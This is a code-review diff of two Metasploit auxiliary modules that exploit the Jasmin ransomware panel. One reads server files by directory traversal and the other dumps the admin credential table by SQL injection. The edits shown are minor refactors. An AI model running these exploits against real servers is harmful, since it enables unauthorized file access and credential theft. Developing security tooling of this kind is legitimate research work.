reviews for jasmin ransomware panel

Author: h00die

modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb

@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
 
@@ -65,7 +66,7 @@ def run
     )
     fail_with(Failure::Unknown, 'No response from server') if res.nil?
     fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
-    fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 302
 
     print_good(res.body)
     # store loot

modules/auxiliary/gather/jasmin_ransomware_sqli.rb

@@ -4,6 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::SQLi
@@ -74,10 +75,8 @@ def run
       fail_with(Failure::Unreachable, 'Connection failed') unless res
     end
 
-    unless @sqli.test_vulnerable
-      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
-      return
-    end
+    fail_with(Failure::NotVulnerable, "#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.") unless @sqli.test_vulnerable
+
     columns = ['admin', 'creds']
     vprint_status('Dumping login table')
     data = @sqli.dump_table_fields('master', columns, '')